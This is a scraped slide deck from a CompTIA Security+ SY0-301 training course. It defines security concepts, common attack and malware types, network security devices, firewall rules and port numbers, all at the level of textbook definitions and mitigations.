Upload
itagei
View
119
Download
8
Tags:
Embed Size (px)
DESCRIPTION
For anyone wanting to take Sec+
Citation preview
CompTIA Security+ Training
CompTIA Security+ Training Instructor: Lisa Szpunar
Getting Started with CompTIA Security+
Training
CompTIA Security+ Training
Getting Started with CompTIA Security+ Training
In This Lesson:
About Your Instructor
About This Course
CompTIA Security+ Training
Getting Started with CompTIA Security+ Training
• Masters degree in computer science
–Specialization in systems design and analysis and security
• Certifications
–CompTIA Security+ SY0-201 and SY0-301
–MCTS
About Your Instructor
Lisa Szpunar
CompTIA Security+ Training
Getting Started with CompTIA Security+ Training
• Suitable for someone who has passed the CompTIA Network+ certification or whom has equivalent knowledge
• Covers 100% of the CompTIA Security+ SY0-301 objectives
• Lessons are best watched in order
• Lesson layout
1. Overview of what will be covered in the lesson
2. Lesson content
3. Vocabulary list of new terminology introduced in that lesson
4. A quick review of what was covered in the lesson
About This Course
CompTIA Security+ Training
Getting Started with CompTIA Security+ Training
• You will learn about:
–The fundamentals of IT security
–How to analyze the threats you will be up against
–Topics to educate employees and users about
–Helping to integrate security with business needs
–So much more!
About This Course
About This Course
Getting Started with CompTIA Security+ Training
Introduction to IT Security
Types of Attacks
Malware Prevention and Cleanup
Network Device Security
Secure Network Administration
Secure Network Design
TCP/IP Protocols and Port Security
About This Course
Attacks on Wireless Networks
Securing Wireless Networks
Host Security
Securing Applications
Data Security
Authentication, Authorization, and Access Control
Physical and Environmental Security
Authentication Services
User Account Management
About This Course
Risk Management
Threat and Vulnerability Assessment and Detection
Risk Mitigation and Deterrence
Log Monitoring and Reporting
Business Continuity
Disaster Recovery Planning
Incident Response
User Education
Social Engineering
About This Course
Cryptography Concepts
Cryptography Tools
Public Key Infrastructure (PKI) Concepts
PKI Implementation
Preparing for your CompTIA Security + SY0-301 Certification Exam
Next Steps
CompTIA Security+ Training Instructor: Lisa Szpunar
Introduction to IT Security
CompTIA Security+ Training
Introduction to IT Security
In This Lesson:
What is IT Security?
Key Terms You Should Know
Confidentiality
Integrity
Availability
Authentication
Authorization
Accounting
Exam Objective:
2.8 Exemplify the concepts of confidentiality, integrity and availability
CompTIA Security+ Training
Introduction to IT Security
• Precautions taken to guard against incidents
–Attacks
–Mischievous behavior
–Human error
• Physical devices, software, configurations, policies, and user education
• Prevent, detect, and recover from an incident
• Keeps data safe from unauthorized access, modification, or destruction during storage and transmission
• Must use a multifaceted approach – security in layers
What is IT Security?
CompTIA Security+ Training
Introduction to IT Security
Key Terms You Should Know
Term Definition
Assets Any type of data or device that helps to support your information systems
Attacker An entity that is attempting to gain unauthorized access or do harm to a system or information
Mitigation Any method used to lower the likelihood or impact of a threat
Non-Repudiation
Prevents a party from denying involvement in a transaction after it has taken place. Also proves that the transaction was complete and the intended party received the data
CompTIA Security+ Training
Introduction to IT Security
Key Terms You Should Know
Term Definition
Vulnerability Any sort of weakness in a system that can be exploited. This can include software bugs, human errors, or a bad configuration
Threat Any potential person, action, or circumstance with the ability to cause damage to a system
Risk The likelihood that a vulnerability will be used or exploited by an attacker as well as the impact of the exploit
Exploit The actual action that compromises the security or integrity of a system or information
The Information Security Triad – CIA
Data And
Services
The Information Security Triad – CIA
Protects data and communications from being seen by unauthorized people
The Information Security Triad – CIA
Data should not be able to be modified without being detected
The Information Security Triad – CIA
What good is a service if it’s not up and running?
Authorization
Authentication
Accounting
The AAA Protocol
The AAA Protocol
Authentication
A process where the person’s identity is determined. This is usually done by providing evidence to prove that the person or system is who they claim to be.
The AAA Protocol
Determines whether the person or object is permitted to perform an activity or access a resource.
Authorization
The AAA Protocol
All access to resources (and failed attempts at access) are recorded for later review.
Accounting
CompTIA Security+ Training
Introduction to IT Security
What We Covered
What is IT Security?
Key Terms You Should Know
Confidentiality
Integrity
Availability
Authentication
Authorization
Accounting
CompTIA Security+ Training Instructor: Lisa Szpunar
Types of Attacks
CompTIA Security+ Training
Types of Attacks
In This Lesson:
Exam Objective:
3.2 Analyze and differentiate among types of attacks
Attacks on Data in Transit
Spoofing/Poisoning
Pharming
Man-in-the-middle
Replay
Denial of Service (DoS)
Distributed DoS
Smurf
Scanners and Sniffers
Attacks Via Email and
Other Communications
Spam
Phishing
Other Attacks
Privilege Escalation
Transitive Access
Client-side Attacks
Attacks on Data in Transit
CompTIA Security+ Training
Types of Attacks
Making data appear to have come from somewhere it did not or be something that it is not.
Example: An attacker changes the MAC address of his wireless card to look like it is from a valid internal machine and uses it to gain access.
Spoofing/Poisoning
Common Spoofing Type
What is Spoofed
Result
IP Spoofing IP Source Address
Data appears to have come from a trusted host
ARP Spoofing/Poisoning
MAC Address Data looks like it came from a network that it didn’t
DNS Spoofing/Poisoning
DNS Info Users are sent to the wrong website. Email is rerouted to the wrong place.
CompTIA Security+ Training
Types of Attacks
Take traffic intended for one destination and redirect it to another.
• DNS spoofing or change the host file on the victim’s computer
• Bogus pharming site usually looks nearly identical to the legitimate site
• Tricks you into entering personal data like username and password
Example: You think you are going to a website that you frequent. The site looks fine and you enter your login information. You receive a login error even though you have given the correct credentials.
Pharming
CompTIA Security+ Training
Types of Attacks
Two parties think they are communicating with each other. The attacker is actually between the two intercepting and controlling the communication.
• Active attack
• Attacker could be just eavesdropping or altering data
Man-in-the-Middle
Mitigation
• Strong mutual authentication
• Public Key Infrastructure
•One-time pads
CompTIA Security+ Training
Types of Attacks
Man-in-the-Middle
MITM Client Server
A B
CompTIA Security+ Training
Types of Attacks
The attacker captures information during transition and then re-sends it later.
Example: Attacker obtains a copy logon/authentication info and uses it later to gain access to a system
Replay
Mitigation
•One-time-use session tokens
• Clock Synchronization
CompTIA Security+ Training
Types of Attacks
The attacker attempts to overload resources like a web server using large amounts of data.
• DoS aims to
–Deny access to resources or information
–Crash a website or operating system
• DoS works by
–Occupying all available bandwidth and/or computing power
Denial of Service (DoS)
Mitigation (just a little)
• Patch Management
• Firewall
• Intrusion Prevention System (IPS)
Symptoms
•Unusually slow network performance
•Website down
CompTIA Security+ Training
Types of Attacks
Denial of Service (DoS)
Common DoS Types
Ping of Death Ping for acknowledgement with too many IMCM packets to handle
Buffer Overflow Overflow the buffer with larger data than it can handle
TCP SYN Flooding Open too many TCP sessions to handle
CompTIA Security+ Training
Types of Attacks
Uses multiple systems to magnify the intensity of the DoS attack. The attacker uses a master system that coordinates third-party zombie nodes to participate in the DoS attack.
Distributed Denial of Service (DDoS)
CompTIA Security+ Training
Types of Attacks
An attacker spoofs ICMP packets that are to look like they came from a host that is the target for the attack.
These packets are broadcast to ping a group of hosts on a network.
All the hosts reply to the target host overloading it and possibly overloading the network along the way.
Smurf
CompTIA Security+ Training
Types of Attacks
Smurf
Spoofed Ping Requests
ICMP Ping Replies
CompTIA Security+ Training
Types of Attacks
• Network Scanner/Sniffer
–Captures and displays network traffic
–Attacker must have internal access
–Mitigation: Proper physical security and security policies
• Port Scanner/Sniffer
–Systematically query ports to see which ones are open
–Attacker can be internal or external
–Xmas scan is an advanced scanner that can get around firewalls
–Mitigation: Properly configure routers and employ firewalls
Scanners and Sniffers
Attacks Via Email and Other Communications
CompTIA Security+ Training
Types of Attacks
• Any unwanted or unsolicited communication
• Sent in bulk
• Normally refers to unwanted email
–Spim is spam over instant messenger
– Forums, newsgroups, text, everywhere
• Can contain malware or links to sites infected with malware
• Costs companies productivity and money for anti-spam services
Spam
Mitigation
• Anti-Spam filter
CompTIA Security+ Training
Types of Attacks
Trying to get personal information by pretending to be as a trusted person, company, or website.
• Often comes as email
• Uses logos and color schemes to try to mimic the legitimate entity
• Tries create a sense of urgency or fear
–Poses as the security team or customer service rep
• Mitigation
–User education
–Spam filter
Phishing
Whaling
Spear Phishing targeted at executives or people with access to epically sensitive information
Vishing
Phishing over VoIP
Spear Phishing
Using information specific to a person/company to make a phishing attempt seem more legitimate
Other Attacks
CompTIA Security+ Training
Types of Attacks
The ability of someone or an application to gain privileges and access that are not intended to have.
•Configuration oversight
•Debugging backdoor left in code
•Could be an outside attacker, a fortuitous insider, or even a malicious insider
Privilege Escalation
Mitigation
• Account Auditing and Management
• Least Privilege
• Code Review
CompTIA Security+ Training
Types of Attacks
When trust is transferred to a third party through a known trusted entity.
• Examples: Joint ventures, consultants
• Mitigation: Don’t give trust to your entire forest. Instead create a separate forest with just the resources you want to share.
Transitive Access
Trust Trust
Trust
CompTIA Security+ Training
Types of Attacks
An attack that exploits the client–server relationship. A user downloads something from a trusted server (FTP, file share, email, web, etc.) and unknowingly get malicious code too.
• Allows attacker to execute programs on the infected machine
• Programs run at the permission level of the user
• If a client does not interact with the server there is no risk of getting any harmful data from the server.
Client-side Attacks
Mitigation
• Firewall with Intrusion Prevention System
CompTIA Security+ Training
Types of Attacks
Key Terms You Should Know
Term Definition
Spoofing Data that masquerades as something it isn't. Data that looks like it is from a legitimate source
Pharming An attack that takes traffic intended for one destination and redirects it to another
Man-in-the-Middle The attacker impersonates two endpoints and controls the communication between them
Replay An attacker captures a data transmission and resends it later
CompTIA Security+ Training
Types of Attacks
Key Terms You Should Know
Term Definition
Denial of Service Deprive the indented users access to a system by overwhelming resources and bandwidth with larger amounts of data than it can handle
Distributed DoS Using the resources of many different systems (usually without their consent) to launch a DoS attack
Smurf Broadcasting spoofed ICMP pings to many hosts on a network and aiming the replies to one target machine creating a DoS attack
CompTIA Security+ Training
Types of Attacks
Key Terms You Should Know
Term Definition
Spam Unsolicited bulk email or other communication
Spim Spam over instant messenger
Phishing Pretending to be a known company or person and asking for personal information like passwords or credit card numbers
Spear Phishing Using knowledge of a person on company to appear trustworthy and extract sensitive information
Whaling Spear phishing aimed at a high ranking person to gain access to especially sensitive information
Vishing Using the anonymity of VoIP to employ phishing schemes
CompTIA Security+ Training
Types of Attacks
Key Terms You Should Know
Term Definition
Privilege Escalation Obtaining permissions, privileges, and access that one is not intended to have
Transitive Access A trusts B, B trusts C, so A trusts C. May be without their knowledge or consent
Client-side Attacks A malicious server doles out rogue code to the clients that access it
Malicious Insider Threat
A employee that has malevolent intent against his or her company
CompTIA Security+ Training
Types of Attacks
What We Covered
Attacks on Data in Transit
Spoofing/Poisoning
Pharming
Man-in-the-middle
Replay
Denial of Service (DoS)
Distributed DoS
Smurf
Scanners and Sniffers
Attacks Via Email and
Other Communications
Spam
Phishing
Other Attacks
Privilege Escalation
Transitive Access
Client-side Attacks
Malicious Insider Threat
Drag the red check boxes over the box bullet point of your choice. To edit or reorder the animations, go to the Animations Tab in the Ribbon Click Custom Animation and use the
Custom Animation task pane to edit the animations.
CompTIA Security+ Training Instructor: Lisa Szpunar
Malware Prevention and Cleanup
CompTIA Security+ Training
Malware Prevention and Cleanup
In This Lesson:
Viruses
Worms
Trojans
Spyware
Adware
Rootkits
Backdoors
Logic Bombs
Botnets
Ransomware
Malware Mitigation
Malware Removal
Exam Objective:
3.1 Analyze and differentiate
among types of malware
CompTIA Security+ Training
Malware Prevention and Cleanup
• A combination of the words malicious and software
–Broad category of software threats
–Created with the intent of being damaging (or just annoying)
• Malicious payloads can:
–Consume bandwidth and resources
–Vandalism – delete files
– Install a backdoor
–Make the PC part of a botnet
–Data theft
–Keystroke logging
– Install unwanted software like other malware
–Display advertisements
Malware
CompTIA Security+ Training
Malware Prevention and Cleanup
• Computer viruses can replicate themselves
• In order to spread to another computer it must attach itself to a program or file
• Spread from by direct action
– send an email attachment
– share files on removable media
Viruses
Host
Program or
File Virus
CompTIA Security+ Training
Malware Prevention and Cleanup
Program/File Viruses that create or infect executable files
Parasitic Appends itself to a legitimate host file. When the host file is opened the virus executes first
Companion Creates a new program with the same name as an existing program
Macro Written in macro language. This virus is embedded in Microsoft Office templates and runs when the document is opened
Virus Types
CompTIA Security+ Training
Malware Prevention and Cleanup
Concealment Viruses that attempt to avoid detection by antivirus software
Polymorphic Changes its code or mutates each time it runs while keeping the function intact
Retrovirus Attacks the antivirus software itself
Stealth Hides by intercepting the antivirus software’s processes. Example: the process of checking a file’s size to see if a virus has been added
Virus Types
CompTIA Security+ Training
Malware Prevention and Cleanup
Other
Boot Sector Infects the master boot record
Multipartite Infects and spreads in multiple ways
Virus Types
CompTIA Security+ Training
Malware Prevention and Cleanup
Worm
• Has the ability to spread without human interaction
• Can replicate itself on your system and send those copies to other machines
• Uses communication/transport features already set up on your machine – like email
Example: A worm uses your email program to send copies of itself to everyone in your address book.
Worms
Worm Worm Worm
CompTIA Security+ Training
Malware Prevention and Cleanup
• Appears to be some kind of desired software or file
• Is actually concealing malicious code
• User is tricked into opening or installing it
• Can not replicate itself
• A computer with trojan malware installed can now be used by attackers
–Botnet
–Data theft, modification, or deletion
–Proxy
Trojans
CompTIA Security+ Training
Malware Prevention and Cleanup
• Cannot spread on its own
• Collects computer and user information
– Internet usage
–Passwords/account numbers
• Can control as well as monitor
– Install additional software – adware
–Redirect browser activity
–Change settings
• Usually installed without the user’s knowledge or consent
• Presence is hard to detect
• Forwards information to attacker
Spyware
CompTIA Security+ Training
Malware Prevention and Cleanup
• Automatically displays or downloads advertisements
• Whether or not the user has consented
• Not necessarily malware
–Can be used in exchange for free or discounted access to a program or service
• Mobile phone apps
Adware
• Not all pop-ups and pop-unders are adware
• Use anti spyware/pop-up blocker program like Windows Defender
Pop-ups
CompTIA Security+ Training
Malware Prevention and Cleanup
• Allows continued root access to a computer
• The attacker must have obtained root access to install the rootkit
–Clicking yes to a prompt asking for permission
• Actively hides from administrators, OS, and antivirus
Rootkits
CompTIA Security+ Training
Malware Prevention and Cleanup
• A hidden method of bypassing the normal authentication process
• Can be hard coded in by a program’s creator
• Can be added by malware
–Trojans
–Rootkits
Backdoors
CompTIA Security+ Training
Malware Prevention and Cleanup
• Malware designed to launch based on a predetermined event
–Date and time (time bomb)
–Deletion of a particular user account
–Reboot
• Delivers a malicious payload
–Delete data
–Destroy network infrastructure
Logic Bombs
CompTIA Security+ Training
Malware Prevention and Cleanup
A colony of remote machines that are infected with malware allowing an attacker to use their resources to coordinate an attack.
• Example uses
–Distributed denial of service attacks
–Sending spam
–Brute force attacks
• Spammers or others can purchase the use
of botnets that are already set up
Botnets
CompTIA Security+ Training
Malware Prevention and Cleanup
• Holds systems or data hostage by encrypting it
• Threatens harmful or destructive action
• Demands ransom money for the return of the data or the removal of malicious code
Ransomware
CompTIA Security+ Training
Malware Prevention and Cleanup
• Install antivirus software
and
• Update antivirus software
• Disallow common vehicles for viruses
– .exe files
• Macros
• Least privilege
• User education
–Acceptable use policy
• Backups
Malware Mitigation Virus Found!
Click Here to Remove
!
Continue Unprotected
Viruses Cause: • Privacy Invasion • Security Risks • System Crashes • Infecting other Computers
Scareware
CompTIA Security+ Training
Malware Prevention and Cleanup
1. Remove the infected computer from the network
2. Take an image or backup files to an isolated drive
3. Antivirus software
4. Internet search (be very cautious)
• Malware removal tools
• Infection specific tools or tutorials
• Forums and blogs
5. Restore or reinstall the OS
Malware Removal
CompTIA Security+ Training
Malware Prevention and Cleanup
Key Terms You Should Know
Term Definition
Viruses Malicious code that must attach itself to another piece of code to replicate
Worms Independent malicious code that self-replicates
Trojans Appears to provide one desired service but also (or instead of) has a hidden purpose
Spyware Malware that works on behalf of a third party to gather information and install more malware on a infected machine
Adware Software that automatically downloads and displays advertisements
CompTIA Security+ Training
Malware Prevention and Cleanup
Key Terms You Should Know
Term Definition
Rootkits Code that offers the attacker prolonged remote root access
Backdoors An intentional or forced way around normal authentication and access control
Logic Bombs Malicious code that is set to launch after a specific condition is met
Botnets A group of remote hosts with code installed that allows an attacker to use their resources to anonymously send attacks and spam
Ransomware Malicious code that holds data or systems hostage and will only release them once a random is met
CompTIA Security+ Training
Malware Prevention and Cleanup
What We Covered
Viruses
Worms
Trojans
Spyware
Adware
Rootkits
Backdoors
Logic Bombs
Botnets
Ransomware
Malware Mitigation
Malware Removal
CompTIA Security+ Training Instructor: Lisa Szpunar
Network Device Security
CompTIA Security+ Training
Network Device Security
In This Lesson:
Firewalls
Routers
Switches
Load Balancers
Proxies
Web Security Gateways
VPN Concentrators
Network-based Intrusion Detection and Intrusion Prevention
Other Security Appliances
Protocol Analyzers / Sniffers
Host-based Filtering Tools
Exam Objective:
1.1 Explain the security function
and purpose of network devices and technologies
CompTIA Security+ Training
Network Device Security
• Purposes
– Isolate a network or part of a network
–Control and filter traffic from untrusted sources
–Network address translation (NAT)
–Create a demilitarized zone (DMZ)
• Form of
–Hardware – Stand-alone – Network-based
–Software – Integrated – Host-based
Firewalls
Firewall Best Practices
• All inbound and outbound communication should be filtered
•Deploy firewalls between different departments and/or security levels
• Keep patched and updated
CompTIA Security+ Training
Network Device Security
• Packet Filter
– Filters packets based on their header information
• Source / Destination address (port number)
–Doesn’t look at packet contents
Example: a packet filtering firewall has a rule to disallow Telnet access. The firewall looks at the IP header and if port 23 is present, the packet is dropped or denied.
Firewall Types
Strengths
• Already in your environment
• Fast
Weaknesses
• Static and “unintelligent”
• Spoofing / malicious content
CompTIA Security+ Training
Network Device Security
• Proxy Firewall
–Acts as an intermediary between your network and the outside
– Intercepts, inspects, and repackages
• Can look at packet content
• Forwards or rejects data based on a set of rules
• Application Level
–More advanced rules for one application/service/port
Firewall Types
Strengths
•Hides internal users from
the external network
Weaknesses
• Slower
•Harder to set up
CompTIA Security+ Training
Network Device Security
• Web Application Firewall
–Server-side firewall that protects a the web-client web-server interactions
–Application specific
–Works to prevent:
• SQL injection
• Cross-site scripting (XCC)
• Other web application attacks
Firewall Types
CompTIA Security+ Training
Network Device Security
• Stateful Inspection (or Stateful Packet Filtering)
–Keeps track of the state of network connections
• Uses a state table to log every communication channel
–Knows what to expect from a given communication session
–Keeps ports closed unless they are in use
Firewall Types
Strengths
• Application-layer awareness
• Faster then proxy firewalls
Weaknesses
•Denial-of-Service attack can
overload the state table
CompTIA Security+ Training
Network Device Security
Routers
• Purposes
–Communication between separate networks
–Segmentation
–Determine the best path for data packets to travel
– Firewall
• Form of
–Hardware – Stand-alone
– Integrated
Router Best Practices
• Configure the router to prevent unauthorized modifications to the routing tables
• Change the default password
• Keep patched and updated
CompTIA Security+ Training
Network Device Security
Routers
• Security Functions
–Segmentation
• Limits broadcast traffic
• Isolation
–Access Control Lists (ACL)
– Filtering
• Vulnerabilities
–Poor configuring and hardening
–Unauthorized routing table entry
Internet
Internal Network 2
Internal Network 1
CompTIA Security+ Training
Network Device Security
• Purposes
–Create networks or subnets
– Join resources together
• Form of stand-alone hardware
Switches
CompTIA Security+ Training
Network Device Security
• Security Function
–Data not broadcast (unlike hubs) so it can’t be sniffed
–MAC address filtering rules (basic firewall)
• Vulnerabilities
–ARP Spoofing / Man-in-the-Middle
–Older switches use Telnet to configure
–An attacker with access can turn on mirroring to sniff all traffic
Switches
Switch Best Practices
•Hubs should be replaced with switches
• Configuration of the switch should be done over secure ports/protocols
• Keep patched and updated
CompTIA Security+ Training
Network Device Security
• Purpose
–Distributes computing workload across multiple machines
• Form of
–Hardware – Stand-alone
–Software – Integrated (NAT, Routing, Firewall)
Load Balancers
Redundant Servers
Client Load Balancer
CompTIA Security+ Training
Network Device Security
• Security Function
–Availability
–Can provide failover
–Usually integrated with other security features
• Vulnerabilities
–Depends on what it is integrated with
–Model specific vulnerabilities
• Keep it patched and up-to-date
Load Balancers
CompTIA Security+ Training
Network Device Security
• Purposes
– Intermediary device or software that acts on behalf of a system or person
–Keeps copies of commonly used items for quick delivery (cache)
• Form of
–Computer system
–Application
Proxies
Proxy Best Practices
• Internal user interaction with the outside internet should go through a proxy
• Automatically update the list of and block known malicious sites
• Cache often accessed sites
CompTIA Security+ Training
Network Device Security
Resource www.example.com Web Server
1.1.1.1
2.2.2.2
• Security Functions
– Filter and control outbound traffic
• Proprietary data
• Outgoing malicious content
• Prevent visiting restricted sites
–Keep internal machines anonymous
• Vulnerabilities
–Single point for an attacker to
gain access to data
Proxies
Client
Proxy
CompTIA Security+ Training
Network Device Security
• Purposes
–Proxy, content filtering, and other security functionally in one device
• Form of
–Appliance
• Security Functions
–Malware inspection/filtering
–URL filtering
–Content monitoring
–Productivity monitoring
–Data leak prevention (DLP)
–Policy compliance
Web Security Gateways
CompTIA Security+ Training
Network Device Security
• Purposes
–Establish and handle large amounts of simultaneous virtual private network (VPN) tunnel connections
–Provide authentication and access control
• Form of
–Appliance
• Security Functions
–Authentication
–Authorization
–Accounting
–Encryption
• Weakness
–Denial-of-Service
VPN Concentrators
CompTIA Security+ Training
Network Device Security
• Purposes
– Inspect network traffic and identify suspicious patterns
– Issue alerts when potential attacks have taken place
• Form of
–A system of sensors, controllers, and other components
–Hardware – Stand-alone
–Software – Integrated
Tap
Network-based Intrusion Detection Systems (NIDS)
Internet Network
CompTIA Security+ Training
Network Device Security
• Security Functions
– Filter traffic to look for unauthorized use or attacks
• Weaknesses
– False positives and false negatives
–Can not inspect encrypted data
–Needs active manual involvement
–High traffic volume
Network-based Intrusion Detection Systems (NIDS)
Passive Response Active Response
•Log event details •Terminate the offending process or session
•Notify or send an alert to the IDS administrator
•Make configuration changes to block the offending port or IP address
•Ignore attacks that are harmless •Isolate attack in honeypot and monitor it
CompTIA Security+ Training
Network Device Security
• Purposes
– Filter and detect just like IDS
–Respond to an attack in process
• Form of
–A hardware and software system
• Security Functions
–Able to combat attacks in real time
• Weaknesses
–More expensive
–Harder to configure
Network-based Intrusion Prevention Systems (NIPS)
CompTIA Security+ Training
Network Device Security
Kinds of NIDS and NIPS
Attack Signature Database
• Signature-based
– Compares traffic to a database of known attack signatures
• Keep this database up-to-date!
• Content-based signatures
– Particular flag set, string of characters, etc.
• Context-based signatures
– An usually high level of ICMP pings and port scans
• Behavior-based/Anomaly-based/Heuristic
– Looks for changes to usual network behavior
• Higher traffic volume
• Repeated policy violations
– Compare the current traffic and events to a network history database
Network History
Database
CompTIA Security+ Training
Network Device Security
• Spam Filters
–Appliance filters messages before they get to the mail server
–Block messages from known spammers
–Scan message for common spam elements
• Flag, separate, or completely block
– Looks at both incoming and outgoing mail
• All-in-one Security Appliance
–Stateful firewall – Content filtering
– IDS and IPS – Load balancing
–Data leak prevention – VPN
–Antivirus – Network analyzer
–Anti-spam – Reporting
Other Security Appliances
CompTIA Security+ Training
Network Device Security
• Purposes
– Find unusual types/amounts of traffic
– Look for the traffic that infected systems send
– Find misconfigurations like open ports
–Capture traffic during incident response
–Can be placed to look at inbound, outbound, and internal traffic
• Form of
–Software on a PC that has a NIC in promiscuous mode
–A switch with port mirroring turned on
–A switch with a built-in port analyzer port
–Hardware taps
Protocol Analyzers / Sniffers
CompTIA Security+ Training
Network Device Security
• URL Filtering
–Web browser blocks websites based on their URL address
–Checks URL against a list of known malware sites before showing the page
– Internet Explorer SmartScreen Filter, McAfee SiteAdvisor
• Content Inspection
–Scans the data you are trying to access for red flags
– Internet Explorer Content Advisor
–Can find network level content inspection software that works with proxies or other network devices
• Malware Inspection
–OS software that attempts to stop malware from entering a host
–Microsoft Security Essentials
Host-based Filtering Tools
CompTIA Security+ Training
Network Device Security
Key Terms You Should Know
Term Definition
Firewalls Hardware and/or software that protects the internal network from attackers on the outside public internet
Web Application Firewall
Used to secure a web-server against XSS and injection attacks
Routers A device that connects two or more networks and determines the path that data packets will take
Switches A device joins clients, servers, printers, and other resources to create a network
Load Balancers A network device that distributes computing workload across multiple machines
Proxies Acts as an intermediary and prevents direct connection between two parties
CompTIA Security+ Training
Network Device Security
Key Terms You Should Know
Term Definition
Web Security Gateways
Proxy and content filtering functionally in one device that filters all communication between the internal clients and the outside internet
VPN Concentrators A device that creates and secures multiple VPN connections
NIDS A system that inspects network traffic and issues alerts for suspicious, malicious, or undesirable behavior
NIPS A system that detects and responds to suspicious, malicious, or undesirable network traffic
Spam Filters An appliance that works at the network layer to block spam messages before they enter the email system
CompTIA Security+ Training
Network Device Security
Key Terms You Should Know
Term Definition
All-in-one Security Appliances
An appliance that offers unified threat management
Protocol Analyzers and Sniffers
Software or hardware tool used to observe network traffic for troubleshooting or to create a baseline
URL Filtering Software that determines which websites a user can access based on a list of known unsafe URLs
Content Inspection Software that inspects the content on a requested website and blocks unsafe or undesirable content
Malware Inspection Software that attempts to block malware before it enters a machine
CompTIA Security+ Training
Network Device Security
What We Covered
Firewalls
Routers
Switches
Load Balancers
Proxies
Web Security Gateways
VPN Concentrators
Network-based Intrusion Detection and Intrusion Prevention
Other Security Appliances
Protocol Analyzers / Sniffers
Host-based Filtering Tools
CompTIA Security+ Training Instructor: Lisa Szpunar
Secure Network Administration
CompTIA Security+ Training
Secure Network Administration
In This Lesson:
Rule-based Management
Access Control Lists (ACLs)
Firewall Rules
Secure Router Configuration
Port Security
Flood Guards
Loop Prevention
Network Separation and Network Bridging
Log Analysis
Exam Objectives:
1.2 Apply and implement secure network administration principles
3.6 (Partial) Analyze and differentiate among types of mitigation and deterrent techniques
CompTIA Security+ Training
Secure Network Administration
• Controlling communications and access to resources based on a list of rules that are configured by the administrator
• Examples
–ACLs and firewall rules
– Firewalls, routers, proxies, and more
• Rules are processed in a top-down order
–The first rule that matches is executed, all others are ignored
–The last rule on the list must be a catch-all
• Deny all or implicit deny
• Allow all or allow any
Rule-based Management
CompTIA Security+ Training
Secure Network Administration
Access Control Lists (ACLs)
• Defines who is allowed to do an activity, access a resource, or use a communication pathway
• Allow administrators to customize and adapt security to deal with the specific needs and threats of the network
• Access Control Entries (ACE) on the ACL define these rules
–Network devices: what hosts or types of traffic can access which ports or services
–Computer file system: permissions attached to an object
CompTIA Security+ Training
Secure Network Administration
• Define what traffic is allowed and what traffic is denied
–Criteria: source or destination address, port, content
–Action: allow, deny, allow only if secured
• Should line up with your organization’s needs and security polices
• Use the principles of least access and implicit deny
• Perform regular rule audits
–Temporary rules that ended up being permanent
–Exceptions placed before the general rule
–Orphaned rules
–Typos
Firewall Rules
Virus
Firewall Rule Best Practices •Use a deny-by-default or implicit deny policy instead of allow-by-default
• Close ports above 1024 unless you have a specific application that needs one
Firewall Rules: Ports to Remember
Find more port information at: www.iana.net
Virus
Service Acronym
Service Name Number TCP UDP
FTP File Transfer Protocol 20 – data transfer
x 21 – control
SSH Secure Shell 22 x x
SCP Secure Copy 22 x x
TELNET Telnet 23 x
SMTP Simple Mail Transfer Protocol 25 x
TFTP Trivial File Transfer Protocol 69 x
HTTP Hypertext Transfer Protocol 80 x x
POP3 Post Office Protocol v3 110 x
SFTP Secure/SSH File Transfer Protocol 115 x
NetBIOS Network Basic Input/Output System
137 – name service
x x 138 – datagram service
139 – session service
IMAP Internet Message Access Protocol 143 x
HTTPS HTTP Secure 443 x
FTPS FTP Secure 989 – data transfer
x x 990 – control
CompTIA Security+ Training
Secure Network Administration
Secure Router Configuration
• Change the default username and password
• Keep the firmware patched and updated
• Study the documentation or hardening guide for your specific model
• Create and maintain a baseline document for your router
• Backup configurations before making any major changes or performing updates (keep this backup secure too)
• Remotely manage the router only over secure channels (not Telnet)
CompTIA Security+ Training
Secure Network Administration
Secure Router Configuration
• Never pass the admin password in cleartext
• Use and configure MAC address
filtering (firewall) on the router
• Use in conjunction with other security devices and technologies
• Physically secure the router device
CompTIA Security+ Training
Secure Network Administration
• Disable Unused Ports
–Any port not in use should be closed
– Frequently audit your settings
• MAC Limiting / MAC Filtering
–Only allow network access to the MAC address of known machines
– Layer 2
–Don’t forget that a MAC can be spoofed
Port Security
CompTIA Security+ Training
Secure Network Administration
• IEEE 802.1X Standard
–EAPOL: Extensible Authentication Protocol (EAP) over LAN
–An additional layer of authentication between client and the authentication server (like RADIUS)
–Unauthorized State: limits communication to the form of encapsulated EAPOL messages until the client has authenticated with the 802.1X authenticator device (like an edge switch)
–Once the client is authenticated normal ports are opened
Port Security
802.1X Vulnerabilities
•Man-in-the-Middle
•Hijacking
CompTIA Security+ Training
Secure Network Administration
• Feature built into firewalls and routers
• Allows the administrator to change the tolerance for unanswered login attacks
• Once that tolerance is reached the flood guard will automatically begin blocking that type of request
• Reduce the likelihood of a DoS attack
Flood Guards
CompTIA Security+ Training
Secure Network Administration
• A loop is a transaction pathway that repeats itself
• Layer 2 switches can be configured to offer loop protection
Loop Protection
Resolve Ethernet Looping
Spanning Tree Protocol (STP) Make sure there is only one active path between two nodes
CompTIA Security+ Training
Secure Network Administration
• A loop is a transaction pathway that repeats itself
• Layer 2 switches can be configured to offer loop protection
Loop Protection
Resolve Ethernet Looping
IP Loop Protection
Disable Broadcast Forwarding
Spanning Tree Protocol (STP) Make sure there is only one active path between two nodes
Adds Time To Live (TTL) counters to packets Limit the distance packets are allowed to travel before discarding
Protects against duplicate ARP requests
CompTIA Security+ Training
Secure Network Administration
• Set up more than one physical network to separate groups inside one company
–Sensitive proprietary data
–Customer’s personal information
–Test environment
• Network Bridging happens when a device has more than one network interface, each connected to a different network
–Doesn’t limit broadcast domains
–Can cause latency and loops
• Use routers and firewalls for higher control if you must join separate networks
Network Separation and Network Bridging
CompTIA Security+ Training
Secure Network Administration
• Administrators can turn logging on in many places
–Routers, switches, proxies, IPS, every device!
–More useful after an event than real-time
• Many products are available to help compile and parse logs
–Spunk
–Microsoft System Center Operations Manager
• Decide on a log analysis plan and the accompanying tools based
on your environment’s needs and budget
Log Analysis
CompTIA Security+ Training
Secure Network Administration
Key Terms You Should Know
Term Definition
Rule-based Management
Controlling actions and access through rules or filter based systems
Firewall Rules A list of rules that are excited in order and define what ports, addresses, or other criteria are allowed to pass
Implicit Deny The action or access is not allowed unless there is a rule specifically permitting it. Found at the end of a rule set or ACL
CompTIA Security+ Training
Secure Network Administration
Key Terms You Should Know
Term Definition
Access Control Lists
(ACL) A list or table that defines what hosts, users, or types of traffic are allowed to access what resources or communication channels
MAC Limiting MAC Filtering
A list of the MAC addresses that are allowed to access the network
802.1X The IEEE standard the defines a port based authentication technology based on EAP. Think of it as an authentication proxy
CompTIA Security+ Training
Secure Network Administration
Key Terms You Should Know
Term Definition
